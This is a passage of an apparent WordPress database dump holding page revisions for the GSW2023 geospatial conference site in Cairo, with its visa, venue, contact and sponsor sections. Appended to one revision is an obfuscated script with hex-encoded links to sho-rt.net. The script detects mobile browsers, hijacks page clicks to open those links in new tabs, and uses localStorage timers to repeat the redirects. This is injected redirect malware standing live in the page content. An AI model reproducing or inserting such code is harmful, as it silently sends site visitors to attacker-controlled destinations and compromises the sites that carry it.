information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:47:57','2023-06-25 16:47:57','',3066,'https://gsw2023.com/?p=4831',0,'revision','',0),
(4832,4,'2023-06-25 16:48:24','2023-06-25 16:48:24','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687710061920{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that 